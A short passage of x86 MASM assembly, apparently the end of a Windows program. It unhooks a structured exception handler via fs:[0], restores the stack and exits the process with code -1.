    ; unhook, and exit with -1.  It never returns to the dispatcher.
    mov     esp,OldEsp
    pop     fs:[0]
    add     esp,4
    invoke  ExitProcess,-1
end main